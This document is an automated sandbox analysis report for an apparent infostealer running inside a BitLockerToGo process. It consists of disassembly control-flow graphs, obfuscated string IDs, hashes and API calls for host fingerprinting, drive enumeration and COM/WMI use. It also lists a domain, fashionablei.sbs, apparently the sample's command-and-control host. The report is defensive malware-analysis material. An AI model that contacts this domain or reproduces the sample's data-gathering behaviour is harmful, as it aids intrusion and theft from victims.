423986-42398e 226->230 244 423aa2-423aab 227->244 245 423a85-423a87 227->245 238 423990-42399f 230->238 239 4239b8 230->239 250 4238ef-4238fb 236->250 251 42392c-423936 236->251 241 423a32-423a34 237->241 242 423a40 237->242 258 4239a0-4239a7 238->258 268 4239c2-4239d4 call 442710 239->268 253 423a20-423a23 241->253 254 423a36-423a38 241->254 242->224 243->243 260 4236db-4236de 243->260 256 423ac0 244->256 257 423aad-423ab2 244->257 255 423a90-423a93 245->255 252 423907-42390b 250->252 251->202 251->203 251->204 251->207 251->211 251->213 251->219 251->220 251->221 251->222 264 423924 252->264 265 42390d-423916 252->265 262 423a25-423a2a 253->262 254->262 271 423aa0 255->271 272 423a95-423a9c 255->272 263 423ac7-423b11 call 40c820 call 40e690 call 423b40 256->263 257->263 266 4239b0-4239b6 258->266 267 4239a9-4239ac 258->267 269 4236e0-4236e5 260->269 270 4236ec 260->270 262->224 262->237 263->219 264->251 273 423918-42391c 265->273 274 42391e 265->274 266->239 266->268 267->258 277 4239ae 267->277 268->211 279 4236ef-42372f call 40c820 269->279 270->279 271->244 272->255 275 423a9e 272->275 273->274 281 423900-423905 274->281 282 423920-423922 274->282 275->244 277->239 287 423730-423755 279->287 281->251 281->252 282->281 287->287 289 423757-42375f 287->289 291 423781-42378e 289->291 292 423761-423766 289->292 295 423790-423794 291->295 296 4237b1-4237d2 call 445ed0 291->296 294 423770-42377f 292->294 294->291 294->294 297 4237a0-4237af 295->297 296->202 296->203 296->204 296->206 296->207 296->208 296->209 296->210 296->211 296->213 296->219 296->220 296->221 296->222 297->296 297->297
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %. $$,<,($0"$>:;0$@C$SU$SW$^Y$b$#.$j${G
                                                                                                      • API String ID: 0-588226034
                                                                                                      • Opcode ID: aafa4944afe52cde15743d0793ef6a8d4b4c08537234a1d4e3bcc40b15462adc
                                                                                                      • Instruction ID: 90167dd847b009c3f953fd40b4b51aed2521c9326bb531357beb2cef50c1925d
                                                                                                      • Opcode Fuzzy Hash: aafa4944afe52cde15743d0793ef6a8d4b4c08537234a1d4e3bcc40b15462adc
                                                                                                      • Instruction Fuzzy Hash: B92221B5A083909FD710DF24E85066FBBF1AF86304F58892EF4D58B342D779C9058B8A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 300 40ee20-40eea8 301 40eeb0-40eeb9 300->301 301->301 302 40eebb-40eece 301->302 304 40f150-40f15e 302->304 305 40f170 302->305 306 40f190-40f205 call 40c780 302->306 307 40f133-40f141 302->307 308 40f184-40f18b 302->308 309 40eed5-40eed7 302->309 310 40f176-40f17d 302->310 311 40f236-40f245 302->311 312 40eedc-40f108 302->312 313 40f20c-40f218 302->313 314 40f21d-40f226 302->314 315 40f22d-40f234 302->315 304->305 305->310 306->311 306->313 306->314 306->315 316 40f3e4-40f3f8 call 442630 306->316 317 40f3a8-40f3ac 306->317 318 40f30a-40f32e 306->318 319 40f42e 306->319 320 40f350-40f359 306->320 321 40f390-40f3a0 306->321 322 40f470 306->322 323 40f431-40f434 306->323 324 40f371 306->324 325 40f3b3 306->325 326 40f335 306->326 327 40f476-40f6e1 306->327 328 40f377-40f380 306->328 329 40f2f9-40f305 306->329 330 40f3ba-40f3dd 306->330 331 40f33e-40f347 306->331 332 40f35f-40f36a 306->332 333 40f3ff-40f427 306->333 307->304 334 40f452-40f45b 308->334 336 40f45e-40f465 309->336 310->306 310->308 310->311 310->313 310->314 310->315 310->316 310->317 310->318 310->319 310->320 310->321 310->322 310->323 310->324 310->325 310->326 310->327 310->328 310->329 310->330 310->331 310->332 310->333 340 40f250-40f27e 311->340 337 40f110-40f12b 312->337 338 40f446-40f44f 313->338 314->311 314->315 314->316 314->317 314->318 314->319 314->320 314->321 314->322 314->323 314->324 314->325 314->326 314->327 314->328 314->329 314->330 314->331 314->332 314->333 339 40f286-40f2a9 315->339 316->317 316->319 316->322 316->325 316->327 316->330 316->333 346 40f72a-40f73c 316->346 347 40f75a-40f774 316->347 364 40f7dd-40f7e1 316->364 317->319 317->322 317->325 317->327 317->330 317->346 317->347 318->316 318->317 318->319 318->320 318->321 318->322 318->323 318->324 318->325 318->326 318->327 318->328 318->330 318->331 318->332 318->333 319->323 320->332 321->317 345 40f43d 323->345 325->330 326->331 353 40f6f0-40f707 327->353 328->321 329->345 330->316 330->317 330->319 330->322 330->325 330->327 330->333 330->346 330->347 331->320 332->316 332->317 332->319 332->321 332->322 332->323 332->324 332->325 332->327 332->328 332->330 332->333 332->346 333->319 333->322 333->325 333->327 333->330 333->346 333->347 333->364 368 40f7e6-40f7f8 333->368 334->336 337->337 349 40f12d 337->349 338->334 344 40f2b0-40f2d5 339->344 340->340 343 40f280-40f283 340->343 343->339 344->344 374 40f2d7-40f2f2 344->374 345->338 346->316 346->317 346->319 346->321 346->322 346->323 346->324 346->325 346->327 346->328 346->330 346->332 346->333 346->346 346->347 354 40fb00 346->354 355 40f743-40f750 call 43f710 346->355 356 40fac5-40faca 346->356 357 40f8c9-40f939 346->357 358 40fb0d 346->358 359 40fad0 346->359 360 40fa50-40fa75 346->360 361 40fad2-40fad9 346->361 362 40fa1c-40fa1e 346->362 363 40f9dd-40fa05 346->363 346->364 365 40fa9e-40fab2 call 442630 346->365 366 40fae0 346->366 367 40fae4 346->367 346->368 369 40faea-40faf1 346->369 370 40fa37-40fa47 346->370 371 40fab9-40fabe 346->371 372 40f8bb-40f8c2 346->372 373 40fa7c-40fa7d 346->373 375 40f780-40f7bb 347->375 349->307 353->353 383 40f709-40f715 353->383 392 40fb07 354->392 355->347 356->359 388 40f940-40f963 357->388 386 40fb16-40fb1d 358->386 360->354 360->355 360->356 360->358 360->359 360->361 360->366 360->367 360->369 360->373 361->354 361->355 361->358 361->366 361->367 361->369 395 40fa25-40fa30 362->395 393 40fa0c-40fa15 363->393 364->386 365->354 365->355 365->356 365->358 365->359 365->360 365->361 365->366 365->367 365->369 365->371 365->373 366->367 387 40f800-40f82d 368->387 369->354 370->373 371->354 371->355 371->356 371->358 371->359 371->361 371->366 371->367 371->369 371->373 372->354 372->355 372->356 372->357 372->358 372->359 372->360 372->361 372->362 372->363 372->365 372->366 372->367 372->369 372->370 372->371 372->373 398 40fa84-40fa97 373->398 374->316 374->317 374->318 374->319 374->320 374->321 374->322 374->323 374->324 374->325 374->326 374->327 374->328 374->329 374->330 374->331 374->332 374->333 375->375 385 40f7bd-40f7c6 375->385 401 40f718-40f723 383->401 403 40f7cc-40f7d6 385->403 402 40fb27-40fb35 386->402 387->387 399 40f82f-40f85f 387->399 388->388 390 40f965-40f96d 388->390 405 40f991-40f9a0 390->405 406 40f96f-40f977 390->406 392->358 393->354 393->355 393->356 393->358 393->359 393->360 393->361 393->362 393->365 393->366 393->367 393->369 393->370 393->371 393->373 395->354 395->355 395->356 395->358 395->359 395->360 395->361 395->365 395->366 395->367 395->369 395->370 395->371 395->373 398->354 398->355 398->356 398->358 398->359 398->360 398->361 398->365 398->366 398->367 398->369 398->371 398->373 404 40f860-40f88c 399->404 401->346 401->347 401->364 401->368 402->347 402->354 402->356 402->357 402->358 402->359 402->360 402->361 402->362 402->363 402->364 402->365 402->366 402->367 402->368 402->369 402->370 402->371 402->372 402->373 403->354 403->355 403->356 403->357 403->358 403->359 403->360 403->361 403->362 403->363 403->364 403->365 403->366 403->367 403->368 403->369 403->370 403->371 403->372 403->373 404->404 410 40f88e-40f8a1 404->410 408 40f9a2-40f9a4 405->408 409 40f9c5-40f9d6 405->409 407 40f980-40f98f 406->407 407->405 407->407 411 40f9b0-40f9c1 408->411 409->363 413 40f8a7-40f8b4 410->413 411->411 412 40f9c3 411->412 412->409 413->354 413->355 413->356 413->357 413->358 413->359 413->360 413->361 413->362 413->363 413->365 413->366 413->367 413->369 413->370 413->371 413->372 413->373
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: !m%k$#i4g$+e(c$@-+$L3$g!~_$u;q9$v%r#$y)v'$yw
                                                                                                      • API String ID: 0-1298823376
                                                                                                      • Opcode ID: 60bcb29c81a72b4f26f2798094d24862cf0b1c7ceb2e936e2930b7af2029d7b8
                                                                                                      • Instruction ID: 8759766493a00c0779f8a2977687824cc0272d6d8b70f01d4125bb960d0998e5
                                                                                                      • Opcode Fuzzy Hash: 60bcb29c81a72b4f26f2798094d24862cf0b1c7ceb2e936e2930b7af2029d7b8
                                                                                                      • Instruction Fuzzy Hash: AA42CBB5104B41DFE3248F25DC9076BBBE5FB85314F05893CE5A68BAA0EB78A405CB85

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 414 410370-41038c CoInitializeEx 415 410500 414->415 416 410393-4103ae CoInitializeSecurity 414->416 419 410508 415->419 417 410520-410526 CoUninitialize 416->417 418 4103b5-4103ba call 43ce40 416->418 416->419 420 41050e-410514 CoUninitialize 416->420 422 41052e 417->422 423 4103bf-4103e2 418->423 419->420 420->417 424 410532-41053d 422->424 425 4103f0-410419 423->425 426 41054b-410558 424->426 427 41053f 424->427 425->425 428 41041b-41048f 425->428 431 41057b-410583 426->431 432 41055a-410561 426->432 429 410540-410549 427->429 430 410490-4104d0 428->430 429->426 429->429 430->430 433 4104d2-4104e3 430->433 435 410585-410586 431->435 436 41059b-4106b3 431->436 434 410570-410579 432->434 433->422 437 4104e5-4104ec 433->437 434->431 434->434 438 410590-410599 435->438 439 4106c0-410713 436->439 441 4104f0-4104f9 437->441 438->436 438->438 439->439 440 410715-410756 439->440 442 410760-410795 440->442 441->441 443 4104fb 441->443 442->442 444 410797-4107c4 call 40f490 442->444 443->424 446 4107c9-4107cf 444->446 447 4107d6-4107e3 446->447 448 410856-41085f call 403d70 446->448 449 4107ea-41080f GetSystemDirectoryW 446->449 447->417 447->447 447->449 451 410811-410814 449->451 452 410816 449->452 451->452 454 410817-41081f 451->454 452->454 455 410821-410824 454->455 456 410826 454->456 455->456 457 410827-41084f call 40c820 call 43d9b0 call 43f710 455->457 456->457 457->417 457->447 457->448 457->449
                                                                                                      APIs
                                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 00410383
                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004103A5
                                                                                                      • CoUninitialize.OLE32 ref: 0041050E
                                                                                                      • CoUninitialize.OLE32 ref: 00410520
                                                                                                      Strings
                                                                                                      • 28809E1F0843EFDDDD1428A490EDDE47, xrefs: 004103B5
                                                                                                      • fashionablei.sbs, xrefs: 004107BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeUninitialize$Security
                                                                                                      • String ID: 28809E1F0843EFDDDD1428A490EDDE47$fashionablei.sbs
                                                                                                      • API String ID: 679980898-1978349384
                                                                                                      • Opcode ID: a8b16cd298a86d4c89d5751a485401608e0bdc47f696d1866d15775163faedc0
                                                                                                      • Instruction ID: c18d6bec1f663fc8cc7d4cb1d171164fff87ec0442fde2d28db3a54c13568cc8
                                                                                                      • Opcode Fuzzy Hash: a8b16cd298a86d4c89d5751a485401608e0bdc47f696d1866d15775163faedc0
                                                                                                      • Instruction Fuzzy Hash: 50C122B554D3809BE370CF2598817EBBBE2AFD2304F18892DD4C85B395DB394845CB96

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 464 40f490-40f6e1 465 40f6f0-40f707 464->465 465->465 466 40f709-40f715 465->466 467 40f718-40f723 466->467 468 40f7e6-40f7f8 467->468 469 40f72a-40f73c 467->469 470 40f75a-40f774 467->470 471 40f7dd-40f7e1 467->471 474 40f800-40f82d 468->474 469->468 469->469 469->470 469->471 475 40fb00 469->475 476 40f743-40f750 call 43f710 469->476 477 40fac5-40faca 469->477 478 40f8c9-40f939 469->478 479 40fb0d 469->479 480 40fad0 469->480 481 40fa50-40fa75 469->481 482 40f390-40f3a0 469->482 483 40fad2-40fad9 469->483 484 40fa1c-40fa1e 469->484 485 40f9dd-40fa05 469->485 486 40fa9e-40fab2 call 442630 469->486 487 40f35f-40f36a 469->487 488 40fae0 469->488 489 40fae4 469->489 490 40f3e4-40f3f8 call 442630 469->490 491 40f3a8-40f3ac 469->491 492 40faea-40faf1 469->492 493 40f42e 469->493 494 40f470 469->494 495 40f371 469->495 496 40f431-40f465 469->496 497 40f3b3 469->497 498 40f476 469->498 499 40fa37-40fa47 469->499 500 40f377-40f380 469->500 501 40fab9-40fabe 469->501 502 40f3ba-40f3dd 469->502 503 40f8bb-40f8c2 469->503 504 40fa7c-40fa7d 469->504 505 40f3ff-40f427 469->505 472 40f780-40f7bb 470->472 473 40fb16-40fb1d 471->473 472->472 507 40f7bd-40f7c6 472->507 515 40fb27-40fb35 473->515 474->474 508 40f82f-40f85f 474->508 514 40fb07 475->514 476->470 477->480 509 40f940-40f963 478->509 479->473 481->475 481->476 481->477 481->479 481->480 481->483 481->488 481->489 481->492 481->504 482->491 483->475 483->476 483->479 483->488 483->489 483->492 518 40fa25-40fa30 484->518 516 40fa0c-40fa15 485->516 486->475 486->476 486->477 486->479 486->480 486->481 486->483 486->488 486->489 486->492 486->501 486->504 487->469 487->482 487->490 487->491 487->493 487->494 487->495 487->496 487->497 487->498 487->500 487->502 487->505 488->489 490->469 490->470 490->471 490->491 490->493 490->494 490->497 490->498 490->502 490->505 491->469 491->470 491->493 491->494 491->497 491->498 491->502 492->475 493->496 497->502 498->464 499->504 500->482 501->475 501->476 501->477 501->479 501->480 501->483 501->488 501->489 501->492 501->504 502->469 502->470 502->490 502->491 502->493 502->494 502->497 502->498 502->505 503->475 503->476 503->477 503->478 503->479 503->480 503->481 503->483 503->484 503->485 503->486 503->488 503->489 503->492 503->499 503->501 503->504 521 40fa84-40fa97 504->521 505->468 505->469 505->470 505->471 505->493 505->494 505->497 505->498 505->502 527 40f7cc-40f7d6 507->527 524 40f860-40f88c 508->524 509->509 512 40f965-40f96d 509->512 529 40f991-40f9a0 512->529 530 40f96f-40f977 512->530 514->479 515->468 515->470 515->471 515->475 515->477 515->478 515->479 515->480 515->481 515->483 515->484 515->485 515->486 515->488 515->489 515->492 515->499 515->501 515->503 515->504 516->475 516->476 516->477 516->479 516->480 516->481 516->483 516->484 516->486 516->488 516->489 516->492 516->499 516->501 516->504 518->475 518->476 518->477 518->479 518->480 518->481 518->483 518->486 518->488 518->489 518->492 518->499 518->501 518->504 521->475 521->476 521->477 521->479 521->480 521->481 521->483 521->486 521->488 521->489 521->492 521->501 521->504 524->524 528 40f88e-40f8a1 524->528 527->468 527->471 527->475 527->476 527->477 527->478 527->479 527->480 527->481 527->483 527->484 527->485 527->486 527->488 527->489 527->492 527->499 527->501 527->503 527->504 535 40f8a7-40f8b4 528->535 533 40f9a2-40f9a4 529->533 534 40f9c5-40f9d6 529->534 532 40f980-40f98f 530->532 532->529 532->532 536 40f9b0-40f9c1 533->536 534->485 535->475 535->476 535->477 535->478 535->479 535->480 535->481 535->483 535->484 535->485 535->486 535->488 535->489 535->492 535->499 535->501 535->503 535->504 536->536 538 40f9c3 536->538 538->534
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: !m%k$#i4g$+e(c$@-+$L3$g!~_$v%r#$y)v'$yw
                                                                                                      • API String ID: 0-2850119623
                                                                                                      • Opcode ID: 521fc4437b1ff6885b97c5974d82c344bb4ce1fa66cae93c86d9e240ded79fe6
                                                                                                      • Instruction ID: 135bba3f1472b5172c52527fcb552911ff524ad6e6becc77f9f8e7e47305d022
                                                                                                      • Opcode Fuzzy Hash: 521fc4437b1ff6885b97c5974d82c344bb4ce1fa66cae93c86d9e240ded79fe6
                                                                                                      • Instruction Fuzzy Hash: D302BAB5108381DFE3209F25EC907ABBBE5FF86305F05892CE58A8B660EB749445CF56

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 561 420d60-420d83 562 420e12-420e37 561->562 563 420db0-420dd1 561->563 564 420d8a-420da4 561->564 565 420dd8-420df2 call 4218b0 561->565 566 420df9-420e0b 561->566 568 420e40-420e81 562->568 563->562 563->563 563->565 563->566 564->562 564->563 564->565 564->566 565->563 565->566 566->562 566->563 566->565 566->566 568->568 570 420e83-420edf call 41c680 568->570 573 420ee0-420f3e 570->573 573->573 574 420f40-420fd1 call 41c680 573->574 577 420fe0-42101f 574->577 577->577 578 421021-42106f call 41c680 577->578 581 421070-4210b5 578->581 581->581 582 4210b7-4210c1 call 41c680 581->582 584 4210c6-4210d4 582->584 585 4210e0-4210e9 584->585 585->585 586 4210eb-4210ee 585->586 587 4210f0-4210f5 586->587 588 4210f7 586->588 589 4210fa-421113 call 40c820 587->589 588->589 592 421131-42117b 589->592 593 421115-42111f 589->593 594 421180-421194 592->594 595 421120-42112f 593->595 594->594 596 421196-4211a4 594->596 595->592 595->595 597 4211c1-4211c8 596->597 598 4211a6-4211aa 596->598 599 4211b0-4211bf 598->599 599->597 599->599
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%$B1nO$DE$S1Q3$`a$l9E7$c}$}z{
                                                                                                      • API String ID: 0-3034509644
                                                                                                      • Opcode ID: 501b68f1bb23192ed8dc316b6bbf0c8979e38e3ee05b9731e3cd1422e553283a
                                                                                                      • Instruction ID: 31717bb73efeea4282d0362b4ed8f9f18cf2cff66650a96c680f11760a43948e
                                                                                                      • Opcode Fuzzy Hash: 501b68f1bb23192ed8dc316b6bbf0c8979e38e3ee05b9731e3cd1422e553283a
                                                                                                      • Instruction Fuzzy Hash: 95B1FF7290C3508FC7149F29D8812ABBBE1EF96354F159D2CE0D59B362DB388945CB8A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 600 426b58-426bb3 601 426bc0-426c28 600->601 601->601 602 426c2a-426c69 601->602 604 426c72 602->604 605 426c6b-426c70 602->605 606 426c75-426c9e call 40c820 604->606 605->606 610 426ca0-426ca5 606->610 611 426ca7 606->611 612 426cae-426ce5 call 40c820 610->612 611->612 615 426cf0-426d1c 612->615 615->615 616 426d1e-426d29 615->616 617 426d51-426d60 616->617 618 426d2b-426d33 616->618 620 426d62-426d65 617->620 621 426d81-426d8b call 446040 617->621 619 426d40-426d4f 618->619 619->617 619->619 622 426d70-426d7f 620->622 624 426d90-426d98 621->624 622->621 622->622 625 426f10-426faf 624->625 626 427150-427156 call 40c830 624->626 627 427140-427149 call 40c830 624->627 628 426f07 624->628 629 426ef7-426eff 624->629 630 426fe5-427005 624->630 631 427165 624->631 632 42713a 624->632 633 426dae-426db6 624->633 634 426d9f-426da5 624->634 635 42715f 624->635 636 426fb0-426fc4 625->636 626->635 627->626 628->625 629->628 639 427010-42704d 630->639 647 42716b-427174 call 40c830 631->647 632->627 640 426db8-426dbd 633->640 641 426dbf 633->641 634->633 635->631 636->636 643 426fc6-426fdc call 424490 636->643 639->639 646 42704f-4270c9 639->646 642 426dc6-426e5b call 40c820 640->642 641->642 656 426e60-426e72 642->656 643->630 650 4270d0-427116 646->650 658 427180-427186 call 40c830 647->658 650->650 654 427118-427131 call 424300 650->654 654->632 656->656 660 426e74-426e7f 656->660 668 42718f 658->668 663 426ea1-426eac 660->663 664 426e81-426e89 660->664 666 426ed1-426ef0 GetLogicalDrives call 446040 663->666 667 426eae-426eb1 663->667 665 426e90-426e9f 664->665 665->663 665->665 666->626 666->627 666->628 666->629 666->630 666->631 666->632 666->635 666->647 666->658 666->668 672 427195-42719d call 40c830 666->672 673 4271a0-4271aa 666->673 669 426ec0-426ecf 667->669 668->672 669->666 669->669 672->673
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4S;M$HI$`C5}$KI
                                                                                                      • API String ID: 0-2625641319
                                                                                                      • Opcode ID: e99f9c030eb18fafb12e7b36569ea9c9bd74794bde7c31a9ca4732c122a27627
                                                                                                      • Instruction ID: 7bd689930203248f4e124cf4b068447c3e387a35416a19cae673786a67198f05
                                                                                                      • Opcode Fuzzy Hash: e99f9c030eb18fafb12e7b36569ea9c9bd74794bde7c31a9ca4732c122a27627
                                                                                                      • Instruction Fuzzy Hash: BDF1FDB5E00319CFDB24CFA5D8826AEBBB1FF45304F05456DE846AB342E3389905CB95

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 676 43caf0-43cb13 677 43cb18-43cb23 676->677 677->677 678 43cb25 677->678 679 43cb27-43cb2a 678->679 680 43cb6e-43cb8e 679->680 681 43cb2c-43cb6c 679->681 682 43cb93-43cb9e 680->682 681->679 682->682 683 43cba0 682->683 684 43cba2-43cba5 683->684 685 43cba7-43cbca 684->685 686 43cbcc-43cbd0 684->686 685->684 687 43cbd2-43cbdd 686->687 688 43cbe1-43cbfa 687->688 689 43cbdf 687->689 691 43cbfe-43cc09 688->691 692 43cbfc 688->692 690 43cc4c-43cc4f 689->690 693 43cc53-43cc58 690->693 694 43cc51 690->694 695 43cc3e-43cc43 691->695 696 43cc0b-43cc39 call 442710 691->696 692->695 699 43cc5e-43cc7e 693->699 700 43ce2d-43ce3a 693->700 694->693 697 43cc47-43cc4a 695->697 698 43cc45 695->698 696->695 697->687 698->690 702 43cc83-43cc8e 699->702 702->702 704 43cc90 702->704 705 43cc92-43cc95 704->705 706 43cc97-43ccba 705->706 707 43ccbc-43ccc0 705->707 706->705 708 43ccc2-43cccd 707->708 709 43ccd1-43ccea 708->709 710 43cccf 708->710 712 43ccee-43ccf9 709->712 713 43ccec 709->713 711 43cd4e-43cd51 710->711 716 43cd53 711->716 717 43cd55-43cd5a 711->717 714 43ccfb-43cd33 call 442710 712->714 715 43cd3d-43cd42 712->715 713->715 723 43cd38 714->723 719 43cd46-43cd49 715->719 720 43cd44 715->720 716->717 721 43cd6b-43cd8b 717->721 722 43cd5c-43cd68 717->722 719->708 720->711 725 43cd90-43cd9b 721->725 722->721 723->715 725->725 726 43cd9d 725->726 727 43cd9f-43cda2 726->727 728 43cda4-43cdc7 727->728 729 43cdc9-43cdcd 727->729 728->727 730 43cdcf-43cdd5 729->730 731 43cdd7 730->731 732 43cdd9-43cdeb 730->732 733 43ce2b 731->733 734 43cdef-43cdf5 732->734 735 43cded 732->735 733->700 736 43ce1f-43ce22 734->736 737 43cdf7-43ce1d call 442710 734->737 735->736 739 43ce26-43ce29 736->739 740 43ce24 736->740 737->736 739->730 740->733
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: A$F$G$L$p$p$p
                                                                                                      • API String ID: 0-4157924366
                                                                                                      • Opcode ID: a94cc71681b421386ebc3b4c83818784acf519f4479ec627f07e22e8e5f6441e
                                                                                                      • Instruction ID: 3e99673251a91465ff31a0667265cd6904dad94b5fbb79e6f440b482714ecdd2
                                                                                                      • Opcode Fuzzy Hash: a94cc71681b421386ebc3b4c83818784acf519f4479ec627f07e22e8e5f6441e
                                                                                                      • Instruction Fuzzy Hash: 1AA1F2B150C3808BD3158B28D58136EBFD2ABDA308F18592FE1C697382D2BDD844C75B

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 742 43ce40-43ce99 743 43cea0-43ceb4 742->743 743->743 744 43ceb6-43ced3 743->744 746 43cf02-43cf48 CoCreateInstance 744->746 747 43cf00 744->747 748 43cee5-43cef5 744->748 749 43ceda 744->749 750 43cf4f 744->750 751 43cf5d-43cf97 744->751 746->750 746->751 748->747 749->748 750->751 752 43cfa0-43cfbf 751->752 752->752 753 43cfc1-43cff1 SysAllocString 752->753 754 43cff8-43cffd 753->754 754->746 754->747 754->748 754->749 754->750 754->751
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 03$c;m5$v'w!
                                                                                                      • API String ID: 0-4032687651
                                                                                                      • Opcode ID: ffd410ab78e7f3b112ca411c81cedb4f5307960b34125f219934c4b78fe060f0
                                                                                                      • Instruction ID: 397be9ff037f646e9f71634710ddaf264655947a536f9fcebb2eae5914496274
                                                                                                      • Opcode Fuzzy Hash: ffd410ab78e7f3b112ca411c81cedb4f5307960b34125f219934c4b78fe060f0
                                                                                                      • Instruction Fuzzy Hash: A54188781083419FE310CF14D889B5BBBE4FBC6715F10891CF5C89A2A1CBB69949CF96

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 783 42fd63-42fd66 784 42fd72-42fd9d call 4454d0 783->784 785 42fd6d 783->785 791 42fda0-42fdd3 784->791 786 42fe4d-42feaf call 4454d0 GetComputerNameExA 785->786 792 42feb0-42ff1c 786->792 793 42fde0-42fdfa 791->793 792->792 794 42ff1e-42ff27 792->794 793->793 795 42fdfc-42fe05 793->795 796 42ff29-42ff38 794->796 797 42ff4d-42ff50 794->797 799 42fe07-42fe0f 795->799 800 42fe1b-42fe27 795->800 801 42ff40-42ff49 796->801 798 42ff56-42ff62 797->798 803 42ff64-42ff6a 798->803 804 42ff7b-42ffdf GetComputerNameExA 798->804 805 42fe10-42fe19 799->805 806 42fe3b-42fe47 FreeLibrary 800->806 807 42fe29-42fe2f 800->807 801->801 802 42ff4b 801->802 802->798 808 42ff70-42ff79 803->808 809 42ffe0-430037 804->809 805->800 805->805 806->786 810 42fe30-42fe39 807->810 808->804 808->808 809->809 811 430039-430042 809->811 810->806 810->810 812 430044-43004f 811->812 813 43005d 811->813 814 430050-430059 812->814 815 430060-43006c 813->815 814->814 816 43005b 814->816 817 43008b-4300ea 815->817 818 43006e-430074 815->818 816->815 821 4300f0-430122 817->821 819 430080-430089 818->819 819->817 819->819 821->821 822 430124-43012d 821->822 823 43014b-430157 822->823 824 43012f-430135 822->824 826 43016b-4301bf call 4454d0 823->826 827 430159-43015f 823->827 825 430140-430149 824->825 825->823 825->825 832 4301c0-4301fa 826->832 828 430160-430169 827->828 828->826 828->828 832->832 833 4301fc-430205 832->833 834 430207-43020f 833->834 835 43021b-430230 833->835 836 430210-430219 834->836 837 430236-43023d 835->837 838 43034a-430397 835->838 836->835 836->836 839 430240-43024a 837->839 840 4303a0-4303cc 838->840 841 430260-430266 839->841 842 43024c-430251 839->842 840->840 843 4303ce-4303d9 840->843 845 430290-43029f 841->845 846 430268-43026b 841->846 844 4302f0-4302f9 842->844 847 4303fb-4303fe call 434840 843->847 848 4303db-4303e1 843->848 854 4302fb-430301 844->854 851 4302a1-4302a4 845->851 852 43030d-430315 845->852 846->845 849 43026d-430282 846->849 858 430403-43040d 847->858 850 4303f0-4303f9 848->850 849->844 850->847 850->850 851->852 857 4302a6-4302ef 851->857 855 430317-43031c 852->855 856 43031e-430321 852->856 854->838 859 430303-430305 854->859 855->854 860 430323-430344 856->860 861 430346-430348 856->861 857->844 859->839 862 43030b 859->862 860->844 861->844 862->838
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0042FE47
